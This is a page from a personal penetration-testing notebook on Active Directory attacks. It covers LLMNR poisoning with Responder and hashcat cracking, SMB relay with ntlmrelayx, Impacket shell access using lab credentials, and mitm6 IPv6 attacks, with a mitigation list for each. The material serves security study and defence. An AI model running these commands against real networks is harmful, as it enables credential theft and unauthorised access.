refabr1k's Pentest Notebook
  • refabr1k's Pentest Notebook
  • Steganography
  • Kali USB with persistence memory
  • useful tools
  • Understanding ICACLS permissions
  • INFO GATHERING
    • Port Knocking
    • 22 tcp - SSH
      • SSH Tunneling
    • 25 tcp - SMTP
    • 53 tcp/udp - DNS
    • 88 tcp - Kerberos
    • 161 udp - SNMP
    • 445 tcp - SMB
    • 1098,1099 tcp - Java RMI
    • 8009 tcp - AJP
    • 5901,5902 tcp - VNC
  • Web
    • XSS cookie stealing
    • PHP
    • Webdav
    • Wordpress
    • XML RPC
    • SQL Injection
    • SSRF
  • EXPLOITATION
    • File Transfers
    • Buffer Overflow
    • Bruteforce
      • Hashcat
      • Ophcrack (rainbow tables)
      • John The Ripper
    • PHP rce
    • Compiling
    • msfvenom
    • Reverse shell
    • Using ENV to escape Bad Characters
    • shellshock
    • Ncat Persistent Backdoor
  • PRIVESC - LINUX
    • Basic checks
    • Upgrading Shells
    • SUID
  • Privesc - Windows
    • Basic checks / powershell
    • Privesc Openings
    • LonelyPotato - SeImpersonatePrivilege
    • Enable RDP @ Firewall
    • NTLM (Pass The Hash)
  • Windows
    • NTDS.dit
    • Responder / SMB Relay
    • Attacking AD
      • AD Hacking Lab Setup
  • Metasploit
    • Basic Usage
    • Meterpreter
      • Pivoting
      • Windows Post Exploitation
  • Unsorted
    • other notes
  • eLearnSecurity eJPT
    • eJPT notes
  • OSWP
  • Getting started
  • WEP Attacks
    • WEP Attack (OPEN) - Clients connected
    • WEP Attack (OPEN) - Clientless
    • WEP Attack (SKA)
  • WPA/WPA2 Attacks
  • Scripts
    • get port from nmap
    • Curl response
    • ping sweep
    • iptables-counter.sh
    • (DNS) zonetransfer_check.sh
    • (DNS) dns-rev-brute.sh
    • (DNS) dns-fwd-brute.sh
    • (SMB) vuln-scan.sh
    • (SMB) samba-checker.sh
    • (SMTP) vrfy.py
    • (SNMP) mib-check.sh
  • Zeroday vulnerabilities explained
    • 2020-12 Solarwind supply chain
Powered by GitBook
On this page
  • LLMNR Poisoning
  • SMB Relay
  • SMB gaining shell access
  • IPv6 Attacks

Was this helpful?

  1. Windows

Responder / SMB Relay

Hacking Active directory

LLMNR Poisoning

DNS or NBT-NS. Responds with NTLMv2 hash.

responder -I eth0 -rdwv

hashcat -m 5600 hashes.txt rockyou.txt

Mitigation:

  • Disable LLMNR

    Local Computer Policy > Computer Configuration > Administrative Templates > Network > DNS Client in the Group Policy Editor> "Turn OFF Multicast Name Resolution"

  • Disable NBT-NS

    Network Connections > Network Adapter Properties > TCPv4 Properties > Advanced tab > WINS tab > select "Disable NetBIOS over TCP/IP"

(Else)

  • Require Network Access Control

  • Strong user passwords > 14 characters and limit common word usage.

SMB Relay

SMB signing must be disabled on target.

We can scan if host has SMB signing disabled using nessus, smbsign, nmap etc. Below is an namp scan result example where the SMB signing is 'not required' and can perform relay attacks on

nmap --script=smb2-security-mode.nse -p445 192.168.42.0/24

Host script results:
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required

Steps:

  1. write target ip address to targets.txt

  2. Config responder to turn off 'HTTP' and 'SMB' to prevent responding to these protocols /usr/share/responder/Responder./conf

  3. Use ntlmrelayx.py -tf targets.txt -smb2support

Mitigation:

  • Enable SMB signing on all

    • pro: completely stops attacks.

    • con: causes performance issues with file copying

  • Disable NTLM auth

    • pro: completely stops attacks

    • con: if kerberos stop working, windows default back to NTLM

  • Account tiering

    • pro: Limits domain admins to specific tasks

    • con: enforicing policy may be difficult

  • Local admin restriction

    • pro: prevents alot lateral movements.

    • con: potentially increase in amount of service desk tickets

SMB gaining shell access

# Impacket
psexec.py adhacking.local/saul:Password123@192.168.42.139

# Wmiexec
wmiexec.py adhacking.local/saul:Password123@192.168.42.139

# Smbexec
smbexec.py adhacking.local/saul:Password123@192.168.42.139

# Metasploit
exploit(windows/smb/psexec) >

IPv6 Attacks

mitm6 -d adhacking.local

relay attack

PreviousNTDS.ditNextAttacking AD

Last updated 4 years ago

Was this helpful?

mitm6

https://github.com/fox-it/mitm6